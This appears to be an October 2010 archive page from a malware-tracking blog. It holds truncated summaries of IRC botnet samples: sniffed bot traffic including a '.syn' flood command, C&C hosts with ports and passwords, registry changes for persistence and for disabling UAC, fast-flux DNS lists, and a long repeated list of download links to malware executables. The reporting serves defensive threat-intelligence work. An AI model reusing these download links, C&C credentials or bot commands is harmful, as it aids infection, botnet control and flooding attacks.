Month: October 2010

(IRC) [00|ESP|065790]: Bot sniff “190.208.80.238:2071” to “203.190.166.115:7562”: – “USERHOST b2js4nd5v3u MODE b2js4nd5v3u +i MODE #100+ +nts JOIN #100+ hzx USERHOST b2js4nd5v3u MODE b2js4nd5v3u +i MODE #100+ +nts JOIN #100+ hzx USERHOST b2js4nd5v3u MODE b2js4nd5v3u +i MODE #100+ +nts JOIN #100+ hzx USERHOST b2js4nd5v3u MODE b2js4nd5v3u +i MODE #100+ +nts “

(IRC) [00|FRA|720196]: Bot sniff “95.154.242.89:1122” to “78.235.246.30:3256”: – “:Cod!Coded@Coded.Cod PRIVMSG #!pert!# :.login kuzen “ (IRC) [00|FRA|720196]: Bot sniff “95.154.242.89:1122” to “78.235.246.30:3256”: – “:Cod!Coded@Coded.Cod PRIVMSG #!pert!# :.syn 72.20.58.220 6667 100 1000 “

(IRC) [00|FRA|309378]: Bot sniff “66.205.65.100:8080” to “192.168.0.11:3436”: – “:hub.56653.net 302 ezshChDky :ezshChDky=+lyCsdyhBa@rue92-5-82-241-173-16.fbx.proxad.net :hub.56653.net 221 ezshChDky + :ezshChDky!lyCsdyhBa@rue92-5-82-241-173-16.fbx.proxad.net JOIN :##+ :hub.56653.net 332 ezshChDky ##+ :*sc ne 130 0 0 -e -b -r -s|*sc nb1 50 0 0 -e -b -r -s :hub.56653.net 353 ezshChDky @ ##+ :ezshChDky :hub.56653.net 366 ezshChDky ##+ :

Remote Host Port Number 75.118.123.95 8080 PASS secretpass NICK gqlzHDrFG USER xykablogB * 0 :USA|XP|481 MODE gqlzHDrFG JOIN #i lol Other details * The following ports were open in the system: Port Protocol Process 1055 TCP wuaucpl.exe (%Windir%wuaucpl.exe) 17572 TCP wuaucpl.exe (%Windir%wuaucpl.exe) Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWindowsUpdate o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsRead more...

Remote Host Port Number 67.202.108.14 6567 PASS s1m0n3t4 MODE [SI|USA|00|P|27568] -ix JOIN #nuevocsm# c1rc0dus0leil PRIVMSG #nuevocsm# :[p2p]: File injected to peer2peer folders. PRIVMSG #nuevocsm# :WinRAR Injection Activated PONG Coupe2.Network NICK [SI|USA|00|P|27568] USER XP-5246 * 0 :COMPUTERNAME * The following port was open in the system: Port Protocol Process 1053 TCP oldbin.exe (%Windir%oldbin.exe) Registry Modifications *Read more...

Remote Host Port Number 193.106.173.153 6667 NICK n{USA|XP}156462 USER 1564 “” “TsGh” :1564 JOIN #dotz Registry Modifications * The following Registry Keys were created: o HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem o HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindows o HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsSystem * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem] + EnableLUA = 0x00000000 o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%winlogon.exe” + UserFaultCheck = “%System%dumprepRead more...

Remote Host Port Number 217.23.11.143 2000 when u open this from you web browser u will get all exe files from links posted down probably passwd stealers or something like this feel free to search more Download%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exeDownload%http://kruisverheffingbrugge.be/1.exe%http://kruisverheffingbrugge.be/2.exe%http://kruisverheffingbrugge.be/3.exe%http://kruisverheffingbrugge.be/4.exe%http://kruisverheffingbrugge.be/5.exe

Resolved : [g.0x20.biz] To [62.193.249.122] Resolved : [g.0x20.biz] To [210.127.253.90] Resolved : [g.0x20.biz] To [210.166.223.51] Resolved : [g.0x20.biz] To [81.144.210.251] Resolved : [g.0x20.biz] To [80.247.72.130] Resolved : [g.0x20.biz] To [12.50.233.121] Resolved : [g.0x20.biz] To [208.123.165.73] Resolved : [g.0x20.biz] To [173.51.215.195] Resolved : [g.0x20.biz] To [61.221.147.253] Resolved : [gynoman.weedns.com] To [62.193.249.122] Resolved : [gynoman.weedns.com] To [80.247.72.130]Read more...

gutyeaz.com kadds.ru 91.211.117.127 91.211.117.76 91.211.117.76 94.47.254.1 94.47.254.1 UDP Connections Remote IP Address: Port: 2323 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s) of size 0 Remote IP Address: Port: 2323 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s) of size 0 Remote IP Address: 91.211.117.127 Port: 2323 Send Datagram: packet(s) ofRead more...

qia.9966.org 218.10.18.77 Outgoing connection to remote server: qia.9966.org TCP port 8000 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesfyddos_svcname “Description” = fyddos services descrption HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:WINDOWSsystem32svchest.exe” = C:WINDOWSsystem32svchest.exe:*:Enabled:Microsoft (R) Internetal IExplore Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext” HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File” HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”Read more...